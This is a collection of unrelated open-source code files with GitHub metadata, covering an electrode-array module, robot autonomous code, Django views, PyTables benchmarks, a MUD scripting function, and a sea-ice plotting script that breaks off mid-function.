"ref": "refs/heads/master",
"path": "startup/gui/variables.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "15447"
},
{
"name": "C++",
"bytes": "2630344"
},
{
"name": "COBOL",
"bytes": "64449"
},
{
"name": "CSS",
"bytes": "28027"
},
{
"name": "Objective-C",
"bytes": "107529"
},
{
"name": "Python",
"bytes": "2745422"
},
{
"name": "Shell",
"bytes": "6943"
},
{
"name": "Slash",
"bytes": "32856"
}
],
"symlink_target": ""
}
|
"""Multi-electrode arrays."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import os
import os.path as op
import itertools
import numpy as np
from ..utils._types import _as_array
from ..utils._misc import _read_python
#------------------------------------------------------------------------------
# PRB file utilities
#------------------------------------------------------------------------------
def _edges_to_adjacency_list(edges):
"""Convert a list of edges into an adjacency list."""
adj = {}
for i, j in edges:
if i in adj:
ni = adj[i]
else:
ni = adj[i] = set()
if j in adj:
nj = adj[j]
else:
nj = adj[j] = set()
ni.add(j)
nj.add(i)
return adj
def _probe_positions(probe, group):
"""Return the positions of a probe channel group."""
positions = probe['channel_groups'][group]['geometry']
channels = _probe_channels(probe, group)
return np.array([positions[channel] for channel in channels])
def _probe_channels(probe, group):
"""Return the list of channels in a channel group.
The order is kept.
"""
return probe['channel_groups'][group]['channels']
def _probe_all_channels(probe):
"""Return the list of channels in the probe."""
cgs = probe['channel_groups'].values()
cg_channels = [cg['channels'] for cg in cgs]
return sorted(set(itertools.chain(*cg_channels)))
def _probe_adjacency_list(probe):
"""Return an adjacency list of a whole probe."""
cgs = probe['channel_groups'].values()
graphs = [cg['graph'] for cg in cgs]
edges = list(itertools.chain(*graphs))
adjacency_list = _edges_to_adjacency_list(edges)
return adjacency_list
def _channels_per_group(probe):
groups = probe['channel_groups'].keys()
return {group: probe['channel_groups'][group]['channels']
for group in groups}
def load_probe(name):
"""Load one of the built-in probes."""
if op.exists(name):
# The argument can be either a path to a PRB file.
path = name
else:
# Or the name of a built-in probe.
curdir = op.realpath(op.dirname(__file__))
path = op.join(curdir, 'probes/{}.prb'.format(name))
if not op.exists(path):
raise IOError("The probe `{}` cannot be found.".format(name))
return _read_python(path)
def list_probes():
"""Return the list of built-in probes."""
curdir = op.realpath(op.dirname(__file__))
return [op.splitext(fn)[0] for fn in os.listdir(op.join(curdir, 'probes'))
if fn.endswith('.prb')]
#------------------------------------------------------------------------------
# MEA class
#------------------------------------------------------------------------------
class MEA(object):
"""A Multi-Electrode Array.
There are two modes:
* No probe specified: one single channel group, positions and adjacency
list specified directly.
* Probe specified: one can change the current channel_group.
"""
def __init__(self,
channels=None,
positions=None,
adjacency=None,
probe=None,
):
self._probe = probe
self._channels = channels
if positions is not None:
assert self.n_channels == positions.shape[0]
self._positions = positions
# This is a mapping {channel: list of neighbors}.
if adjacency is None and probe is not None:
adjacency = _probe_adjacency_list(probe)
self.channels_per_group = _channels_per_group(probe)
self._adjacency = adjacency
def _check_positions(self, positions):
if positions is None:
return
positions = _as_array(positions)
if self.n_channels is None:
self.n_channels = positions.shape[0]
if positions.shape[0] != self.n_channels:
raise ValueError("'positions' "
"(shape {0:s})".format(str(positions.shape)) +
" and 'n_channels' "
"({0:d})".format(self.n_channels) +
" do not match.")
@property
def positions(self):
"""Channel positions in the current channel group."""
return self._positions
@positions.setter
def positions(self, value):
self._check_positions(value)
self._positions = value
@property
def channels(self):
"""Channel ids in the current channel group."""
return self._channels
@property
def n_channels(self):
"""Number of channels in the current channel group."""
return len(self._channels) if self._channels is not None else 0
@property
def adjacency(self):
"""Adjacency graph in the current channel group."""
return self._adjacency
@adjacency.setter
def adjacency(self, value):
self._adjacency = value
def change_channel_group(self, group):
"""Change the current channel group."""
assert self._probe is not None
self._channels = _probe_channels(self._probe, group)
self._positions = _probe_positions(self._probe, group)
#------------------------------------------------------------------------------
# Common probes
#------------------------------------------------------------------------------
def linear_positions(n_channels):
"""Linear channel positions along the vertical axis."""
return np.c_[np.zeros(n_channels),
np.linspace(0., 1., n_channels)]
def staggered_positions(n_channels):
"""Generate channel positions for a staggered probe."""
i = np.arange(n_channels - 1)
x, y = (-1) ** i * (5 + i), 10 * (i + 1)
pos = np.flipud(np.r_[np.zeros((1, 2)), np.c_[x, y]])
return pos
|
{
"content_hash": "8ef866b37753544b9a74386cfc9fcd3a",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 79,
"avg_line_length": 30.850515463917525,
"alnum_prop": 0.5279866332497911,
"repo_name": "nsteinme/phy",
"id": "714cf732275574446cfeb5bf2e3765e4ef643816",
"size": "6010",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "phy/electrode/mea.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "792"
},
{
"name": "GLSL",
"bytes": "11248"
},
{
"name": "HTML",
"bytes": "751"
},
{
"name": "Makefile",
"bytes": "965"
},
{
"name": "Python",
"bytes": "816412"
}
],
"symlink_target": ""
}
|
try:
import wpilib
except ImportError:
from pyfrc import wpilib
import timed_shoot
class HotShootAutonomous(timed_shoot.TimedShootAutonomous):
'''
Based on the TimedShootAutonomous mode. Modified to allow
shooting based on whether the hot goal is enabled or not.
'''
DEFAULT = False
MODE_NAME = "Hot Aim shoot old"
def __init__(self, components):
super().__init__(components)
wpilib.SmartDashboard.PutNumber('DriveRotateSpeedLeft', -0.5)
wpilib.SmartDashboard.PutNumber('DriveRotateSpeedRight', 0.55)
wpilib.SmartDashboard.PutNumber('DriveRotateTime', 0.1)
wpilib.SmartDashboard.PutBoolean('IsHotLeft', False)
wpilib.SmartDashboard.PutBoolean('IsHotRight', False)
def on_enable(self):
'''these are called when autonomous starts'''
super().on_enable()
self.drive_rotate_speed_left = wpilib.SmartDashboard.GetNumber('DriveRotateSpeedLeft')
self.drive_rotate_speed_right = wpilib.SmartDashboard.GetNumber('DriveRotateSpeedRight')
self.drive_rotate_time = wpilib.SmartDashboard.GetNumber('DriveRotateTime')
print("-> Drive rotate spd L:", self.drive_rotate_speed_left)
print("-> Drive rotate spd R:", self.drive_rotate_speed_right)
print("-> Drive rotate tm:", self.drive_rotate_time)
self.decided = False
self.start_time = None
def on_disable(self):
'''This function is called when autonomous mode is disabled'''
pass
def update(self, time_elapsed):
'''The actual autonomous program'''
# decide if it's hot or not
if not self.decided:
self.hotLeft = wpilib.SmartDashboard.GetBoolean("IsHotLeft")
self.hotRight = wpilib.SmartDashboard.GetBoolean("IsHotRight")
if (self.hotLeft or self.hotRight) and not (self.hotLeft and self.hotRight):
self.decided = True
if self.hotLeft:
self.drive_rotate_speed = self.drive_rotate_speed_left
else:
self.drive_rotate_speed = self.drive_rotate_speed_right
elif time_elapsed > 6:
# at 6 seconds, give up and shoot anyways
self.decided = True
# default to the left
self.drive_rotate_speed = self.drive_rotate_speed_left
# always keep the arm down
self.intake.armDown()
# wait a split second for the arm to come down, then
# keep bringing the catapult down so we're ready to go
if time_elapsed > 0.3:
self.catapult.pulldown()
# wait some period before we start driving
if time_elapsed < self.drive_wait:
pass
else:
#print('oh hai')
if self.decided:
#print (time_elapsed)
# only set this once, so we can calculate time from this
# point on
if self.start_time is None:
self.start_time = time_elapsed
#print('moo')
time_elapsed = time_elapsed - self.start_time
if time_elapsed < self.drive_rotate_time:
# rotate
self.drive.move(0, 0, self.drive_rotate_speed)
elif time_elapsed < self.drive_rotate_time + self.drive_time:
# Drive slowly forward for N seconds
self.drive.move(0, self.drive_speed, 0)
elif time_elapsed < self.drive_rotate_time + self.drive_time + 1.0:
# Finally, fire and keep firing for 1 seconds
self.catapult.launchNoSensor()
|
{
"content_hash": "b870212df0077d10dc5c8cffdd2fe9ce",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 96,
"avg_line_length": 37.097345132743364,
"alnum_prop": 0.5260019083969466,
"repo_name": "frc1418/2014",
"id": "ef812c9d84c6c4e0a7d979ac6196f2c4e22a5004",
"size": "4192",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "robot/robot/old_autonomous/hot_aim_shootOld.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AutoIt",
"bytes": "686"
},
{
"name": "Python",
"bytes": "307255"
}
],
"symlink_target": ""
}
|
import sys
import serial as s
import glob
conn = s.Serial(glob.glob("/dev/tty.usbmodem*")[0])
while True:
sys.stdout.write(conn.read())
|
{
"content_hash": "7876eb5396fe01a65787ef5933ee6e94",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 51,
"avg_line_length": 17.75,
"alnum_prop": 0.6971830985915493,
"repo_name": "deets/raspberry-racer",
"id": "8a25edf704dbc4b1a12b6b7c0528fa6c79b9ed59",
"size": "142",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "usbkey/read.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4394808"
},
{
"name": "C++",
"bytes": "8995935"
},
{
"name": "Objective-C",
"bytes": "8074"
},
{
"name": "Python",
"bytes": "344391"
},
{
"name": "Shell",
"bytes": "1708817"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from .models import Bird, State, Bird_type
admin.site.register(Bird)
admin.site.register(State)
admin.site.register(Bird_type)
|
{
"content_hash": "fce227fd04f8806976262f3aa79777f0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 42,
"avg_line_length": 26.833333333333332,
"alnum_prop": 0.8012422360248447,
"repo_name": "annerainywoods/birding_ear",
"id": "f73d6140a83b2ab3bd0dd3bf09db9ff4114e708a",
"size": "161",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "birding_ear/admin-working.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12430"
},
{
"name": "HTML",
"bytes": "94427"
},
{
"name": "JavaScript",
"bytes": "40225"
},
{
"name": "Python",
"bytes": "42652"
}
],
"symlink_target": ""
}
|
from ecnet import Server
from ecnet.utils.logging import logger
def main():
logger.stream_level = 'debug'
sv = Server(num_processes=4)
sv.load_data('../kv_model_v1.0_full.csv')
sv.limit_inputs(15, output_filename='../kv_model_v1.0.csv')
if __name__ == '__main__':
main()
|
{
"content_hash": "10c030d95a9d2a2cd90fa98115ecc226",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 63,
"avg_line_length": 19.8,
"alnum_prop": 0.6296296296296297,
"repo_name": "TJKessler/ECNet",
"id": "9af77def5aaaea787d91f6b6d1e9930de5c50336",
"size": "297",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/tutorials/Getting Started/scripts/limit_input_descriptors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "55623"
},
{
"name": "TeX",
"bytes": "1794"
}
],
"symlink_target": ""
}
|
def need_to_debug():
# some code here
from doit import tools
tools.set_trace()
# more code
def task_X():
return {'actions':[(need_to_debug,)]}
|
{
"content_hash": "32a17943c34eb074643c150b20fe9af0",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 41,
"avg_line_length": 20.5,
"alnum_prop": 0.5975609756097561,
"repo_name": "okin/doit",
"id": "bc5237d3fa81797c1ded76e5425b1346bad70527",
"size": "165",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "doc/tutorial/settrace.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "182"
},
{
"name": "C++",
"bytes": "46"
},
{
"name": "Python",
"bytes": "566114"
}
],
"symlink_target": ""
}
|
"""Fichier contenant la fonction configuration."""
from fractions import Fraction
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
# Fonction de conversion
def convertir_liste(liste):
"""Convertit la liste passée en argument, récursivement."""
for i, elt in enumerate(liste):
if isinstance(elt, (int, float)):
liste[i] = Fraction(elt)
elif isinstance(elt, list):
convertir_liste(elt)
class ClasseFonction(Fonction):
"""Retourne la configuration d'une salle, personnage ou objet."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.configuration_salle, "Salle", "str")
cls.ajouter_types(cls.configuration_personnage, "Personnage", "str")
cls.ajouter_types(cls.configuration_objet, "Objet", "str")
cls.ajouter_types(cls.configuration_chaine, "str", "str")
@staticmethod
def configuration_salle(salle, nom_configuration):
"""Retourne la configuration spécifique à une salle.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
Paramètres à préciser :
* salle : la salle dont on veut récupérer la configuration
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "forme" s'appliquant à l'éditeur de salle, par exemple,
vous pouvez récupérer la valeur pour chaque salle configurée
grâce à l'instruction :
forme = configuration(salle, "forme")
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si forme:
# forme n'est pas vide, vous pouvez travailler avec
"""
donnee = getattr(importeur.crafting.configuration[salle],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Déréférence
donnee = list(donnee)
convertir_liste(donnee)
return donnee
@staticmethod
def configuration_personnage(personnage, nom_configuration):
"""Retourne la configuration spécifique à un personnage.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
Notez que si vous passez un joueur à cette fonction, le
retour sera toujours vide (les joueurs n'ont pas de
configuration crafting propre). Les PNJ retourneront la
configuration spécifique de leur prototype, car la configuration
est définie au niveau prototype, pas au niveau PNJ.
Paramètres à préciser :
* personnage : le personnage spécifique
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "humeur" s'appliquant à l'éditeur de PNJ, par exemple,
vous pouvez récupérer la valeur pour chaque PNJ configuré
grâce à l'instruction :
humeur = configuration(pnj, "humeur")
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si humeur:
# humeur n'est pas vide, vous pouvez travailler avec
"""
prototype = getattr(personnage, "prototype", None)
if prototype is None:
return None
donnee = getattr(importeur.crafting.configuration[prototype],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Déréférence
donnee = list(donnee)
convertir_liste(donnee)
return donnee
@staticmethod
def configuration_objet(objet, nom_configuration):
"""Retourne la configuration spécifique à un objet.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
Notez que les objets retourneront la configuration
spécifique de leur prototype, car la configuration est
définie au niveau prototype, pas au niveau objet.
Paramètres à préciser :
* objet : l'objet spécifique
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "qualité" s'appliquant à l'éditeur d'objet, par exemple,
vous pouvez récupérer la valeur pour chaque objet configuré
grâce à l'instruction :
qualite = configuration(objet, "qualité")
Notez que le même système s'applique pour des types
particuliers avec leurs extensions spécifiques.
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si qualite:
# qualite n'est pas vide, vous pouvez travailler avec
"""
prototype = getattr(objet, "prototype", None)
if prototype is None:
return None
donnee = getattr(importeur.crafting.configuration[prototype],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Déréférence
donnee = list(donnee)
convertir_liste(donnee)
return donnee
@staticmethod
def configuration_chaine(adresse, nom_configuration):
"""Retourne la configuration spécifique à un donnée variable.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
À la différence des autres usages, vous devez ici préciser
en premier paramètre l'adresse d'une donnée sous la forme
d'une chaîne : par exemple, "zone picte" pour récupérer
l'extension de la zone Picte. Ce système permet de récupérer
certaines données qui ne sont pas définies en crafting (comme
les zones).
Paramètres à préciser :
* adresse : l'adresse de l'information configurée (une chaîne)
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "qualité" s'appliquant à l'éditeur de zone, par exemple,
vous pouvez récupérer la valeur pour chaque zone configurée
grâce à l'instruction :
qualite = configuration("zone NOMZONE", "qualité")
Notez que le même système s'applique pour des types
particuliers avec leurs extensions spécifiques.
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si qualite:
# qualite n'est pas vide, vous pouvez travailler avec
"""
adresse = adresse.lower()
objets = {
"prototype d'objet": importeur.objet._prototypes,
"zone": importeur.salle.zones,
}
objet = None
for nom, dictionnaire in objets.items():
if adresse.startswith(nom + " "):
cle = adresse[len(nom) + 1:]
if cle not in dictionnaire:
raise ValueError("{} introuvable : {}".format(
nom, repr(cle)))
objet = dictionnaire[cle]
break
if objet is None:
raise ErreurExecution("Adresse {} introuvable".format(
repr(adresse)))
donnee = getattr(importeur.crafting.configuration[objet],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Déréférence
donnee = list(donnee)
convertir_liste(donnee)
return donnee
|
{
"content_hash": "8a25505a5facc2c21fe092bccb619d3e",
"timestamp": "",
"source": "github",
"line_count": 249,
"max_line_length": 76,
"avg_line_length": 37.99598393574297,
"alnum_prop": 0.6468660818095339,
"repo_name": "stormi/tsunami",
"id": "63f6268ddcf54cdfc22bb75e02f8845ecd2127ab",
"size": "11188",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/secondaires/crafting/fonctions/configuration.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7188300"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import hotshot
import hotshot.stats
import unittest
import os
import tempfile
from tables import *
verbose = 0
class WideTreeTestCase(unittest.TestCase):
"""Checks for maximum number of childs for a Group."""
def test00_Leafs(self):
"""Checking creation of large number of leafs (1024) per group.
Variable 'maxchilds' controls this check. PyTables support up to
4096 childs per group, but this would take too much memory (up
to 64 MB) for testing purposes (may be we can add a test for big
platforms). A 1024 childs run takes up to 30 MB. A 512 childs
test takes around 25 MB.
"""
import time
maxchilds = 1000
if verbose:
print('\n', '-=' * 30)
print("Running %s.test00_wideTree..." % self.__class__.__name__)
print("Maximum number of childs tested :", maxchilds)
# Open a new empty HDF5 file
#file = tempfile.mktemp(".h5")
file = "test_widetree.h5"
fileh = open_file(file, mode="w")
if verbose:
print("Children writing progress: ", end=' ')
for child in range(maxchilds):
if verbose:
print("%3d," % (child), end=' ')
a = [1, 1]
fileh.create_group(fileh.root, 'group' + str(child),
"child: %d" % child)
fileh.create_array("/group" + str(child), 'array' + str(child),
a, "child: %d" % child)
if verbose:
print()
# Close the file
fileh.close()
t1 = time.time()
# Open the previous HDF5 file in read-only mode
fileh = open_file(file, mode="r")
print(("\nTime spent opening a file with %d groups + %d arrays: "
"%s s" % (maxchilds, maxchilds, time.time() - t1)))
if verbose:
print("\nChildren reading progress: ", end=' ')
# Close the file
fileh.close()
# Then, delete the file
# os.remove(file)
def test01_wideTree(self):
"""Checking creation of large number of groups (1024) per group.
Variable 'maxchilds' controls this check. PyTables support up to
4096 childs per group, but this would take too much memory (up
to 64 MB) for testing purposes (may be we can add a test for big
platforms). A 1024 childs run takes up to 30 MB. A 512 childs
test takes around 25 MB.
"""
import time
maxchilds = 1000
if verbose:
print('\n', '-=' * 30)
print("Running %s.test00_wideTree..." % self.__class__.__name__)
print("Maximum number of childs tested :", maxchilds)
# Open a new empty HDF5 file
file = tempfile.mktemp(".h5")
#file = "test_widetree.h5"
fileh = open_file(file, mode="w")
if verbose:
print("Children writing progress: ", end=' ')
for child in range(maxchilds):
if verbose:
print("%3d," % (child), end=' ')
fileh.create_group(fileh.root, 'group' + str(child),
"child: %d" % child)
if verbose:
print()
# Close the file
fileh.close()
t1 = time.time()
# Open the previous HDF5 file in read-only mode
fileh = open_file(file, mode="r")
print("\nTime spent opening a file with %d groups: %s s" %
(maxchilds, time.time() - t1))
# Close the file
fileh.close()
# Then, delete the file
os.remove(file)
#----------------------------------------------------------------------
def suite():
theSuite = unittest.TestSuite()
theSuite.addTest(unittest.makeSuite(WideTreeTestCase))
return theSuite
if __name__ == '__main__':
prof = hotshot.Profile("widetree.prof")
benchtime, stones = prof.runcall(unittest.main(defaultTest='suite'))
prof.close()
stats = hotshot.stats.load("widetree.prof")
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(20)
|
{
"content_hash": "a89a0092c4aa08692e531f1f722882ae",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 76,
"avg_line_length": 32.724409448818896,
"alnum_prop": 0.5459576515880654,
"repo_name": "joonro/PyTables",
"id": "c5f6651b1c84d28c4aa6ad3f9c671e3c2c7d2f8d",
"size": "4156",
"binary": false,
"copies": "12",
"ref": "refs/heads/develop",
"path": "bench/widetree.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "896101"
},
{
"name": "C++",
"bytes": "97380"
},
{
"name": "CMake",
"bytes": "21598"
},
{
"name": "Gnuplot",
"bytes": "2104"
},
{
"name": "Makefile",
"bytes": "4159"
},
{
"name": "Objective-C",
"bytes": "1404"
},
{
"name": "Python",
"bytes": "3322852"
},
{
"name": "Shell",
"bytes": "16985"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(self, plotly_name="size", parent_name="table.cells.font", **kwargs):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 1),
**kwargs,
)
|
{
"content_hash": "b0e73b46943306ac29c2ef23969b5ef9",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 85,
"avg_line_length": 37.38461538461539,
"alnum_prop": 0.5925925925925926,
"repo_name": "plotly/plotly.py",
"id": "2a30886b391f6c1b3702a5f4b260c79cb9b383db",
"size": "486",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/table/cells/font/_size.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
from django.views.generic import TemplateView
#from apiclient.discovery import build
from googleapiclient.discovery import build
from .utils import SearchResults
from . import *
class SearchView(TemplateView):
template_name = "googlesearch/search_results.html"
def get_context_data(self, **kwargs):
context = super(SearchView, self).get_context_data(**kwargs)
service = build("customsearch", GOOGLE_SEARCH_API_VERSION,
developerKey=GOOGLE_SEARCH_API_KEY)
#add a "try" block to see if googleapiclient throws a 400 error
try:
results = service.cse().list(
q=self.request.GET.get('q', ''),
start=self.page_to_index(),
num=GOOGLE_SEARCH_RESULTS_PER_PAGE,
cx=GOOGLE_SEARCH_ENGINE_ID,
).execute()
results = SearchResults(results)
pages = self.calculate_pages()
#if googleapiclient raises an error, we need to catch it here
except:
#run the search again starting with a defined page 1 instead of the "user" defined
results = service.cse().list(
q=self.request.GET.get('q', ''),
start=1,
num=GOOGLE_SEARCH_RESULTS_PER_PAGE,
cx=GOOGLE_SEARCH_ENGINE_ID,
).execute()
#set some default values used for the context below
page = 1
# previous, current, next pages
pages = [0, 1, 2]
results = SearchResults(results)
""" Set some defaults """
context.update({
'items': [],
'total_results': 0,
'current_page': 0,
'prev_page': 0,
'next_page': 0,
'search_terms': self.request.GET.get('q', ''),
'error': results
})
""" Now parse the results and send back some
useful data """
context.update({
'items': results.items,
'total_results': results.total_results,
'current_page': pages[1],
'prev_page': pages[0],
'next_page': pages[2],
'search_terms': results.search_terms,
})
return context
def calculate_pages(self):
""" Returns a tuple consisting of
the previous page, the current page,
and the next page """
current_page = int(self.request.GET.get('p', 1))
return (current_page - 1, current_page, current_page + 1)
def page_to_index(self, page=None):
""" Converts a page to the start index """
if page is None:
page = self.request.GET.get('p', 1)
return int(page) * int(GOOGLE_SEARCH_RESULTS_PER_PAGE) + 1 - int(GOOGLE_SEARCH_RESULTS_PER_PAGE)
|
{
"content_hash": "02a5afc152b3fd32a66198593869e51b",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 104,
"avg_line_length": 31.920454545454547,
"alnum_prop": 0.551441794232823,
"repo_name": "hzdg/django-google-search",
"id": "c987f60790823115ceed6a494abece037e26fee0",
"size": "2809",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "googlesearch/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1314"
},
{
"name": "Python",
"bytes": "6288"
}
],
"symlink_target": ""
}
|
"""
Global Sea Ice Extent Graph for 1979-Current
Website : https://github.com/emmatoday/PyClimateGraphs
Author : Emma M - GitHub: @emmatoday
Date : 15 February 2017
This code will download and render a current graph of the global sea ice
extent. Beginning in 1979 until yesterday (based on availability of the data
from the NSIDC).
Requisite data files (in case you need to manually download them):
ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/south/daily/data/S_seaice_extent_daily_v2.1.csv
ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/north/daily/data/N_seaice_extent_daily_v2.1.csv
"""
# Load all needed libraries
from __future__ import unicode_literals
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.dates as mdates
import matplotlib.colors as c
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from scipy import stats
import datetime as dt
import os
import math
import calendar
import urllib
import shutil
import sys
import logging
from pprint import pprint
# Set up some constants
DATA_PATH = './data' # Path to data directory
OUTPUT_PATH = './output' # Path to output plot images
OUTDATED_DAYS = 3 # Days after which data is considered outdated
PRE_YEAR = 2010 # Year before which the "pre" data is taken
ROLLING_WINDOW = 7
# URLs where we can fetch the data files
DATA_URLS = {
's': 'ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/south/daily/data/'
'S_seaice_extent_daily_v2.1.csv',
'n': 'ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/north/daily/data/'
'N_seaice_extent_daily_v2.1.csv'
}
def mkdir_if_necessary(dir):
"""
Check if necessary directories exist, creating them if necesary.
"""
try:
os.stat(dir)
except OSError:
os.mkdir(dir)
def data_files_exist():
"""
Check if our data files exist already.
"""
for key, url in DATA_URLS.items():
filename = os.path.split(urllib.parse.urlsplit(url).path)[-1]
if os.path.isfile(os.path.join(DATA_PATH, filename)):
return True
else:
return False
def load_data_files():
"""
Load the data from disk and return the dataframes.
"""
sea_ice_indexes = {}
for key, url in DATA_URLS.items():
filename = os.path.split(urllib.parse.urlsplit(url).path)[-1]
sea_ice_indexes[key] = \
pd.read_csv(os.path.join(DATA_PATH, filename), skiprows=[1])
for key in sea_ice_indexes.keys():
sea_ice_indexes[key].rename(columns=lambda x: x.strip(), inplace=True)
sea_ice_indexes[key]['Date'] = sea_ice_indexes[key]\
.apply(lambda row: dt.date(row['Year'],
row['Month'],
row['Day']), axis=1)
sea_ice_indexes[key]['Date'] = \
pd.to_datetime(sea_ice_indexes[key]['Date'])
minday = np.min(sea_ice_indexes[key]['Date'])
maxday = np.max(sea_ice_indexes[key]['Date'])
newframe = {'Date': pd.Series(pd.date_range(minday, maxday).tolist())}
date_df = pd.DataFrame(newframe)
sea_ice_indexes[key] = pd.merge(left=date_df,
right=sea_ice_indexes[key],
on='Date', how='left')
sea_ice_indexes[key]['Day of Year'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].timetuple().tm_yday, axis=1)
sea_ice_indexes[key]['Year'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].year, axis=1)
sea_ice_indexes[key]['Month'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].month, axis=1)
sea_ice_indexes[key]['Day'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].day, axis=1)
sea_ice_indexes[key]['Extent'] = \
sea_ice_indexes[key]['Extent'].rolling(window=ROLLING_WINDOW,
center=False).mean()
sea_ice_indexes['s'].rename(columns={'Extent': 'S Extent'}, inplace=True)
sea_ice_indexes['n'].rename(columns={'Extent': 'N Extent'}, inplace=True)
return sea_ice_indexes
def data_is_fresh(sea_ice_indexes, outdated_days=OUTDATED_DAYS):
"""
Check if our data appears to be out of date.
"""
for key, sea_ice_index in sea_ice_indexes.items():
today = dt.date.today()
print('Data is {0} day(s) old'
.format((dt.datetime.now() -
sea_ice_index['Date'].iloc[-1]).days))
if (dt.datetime.now() -
sea_ice_index['Date'].iloc[-1]).days >= outdated_days:
return False
else:
return True
def refresh_data_files():
"""
Update datafiles to the latest available from the data URLs.
"""
for key, url in DATA_URLS.items():
url_path = urllib.parse.urlsplit(url).path
url_filename = os.path.split(url_path)[-1]
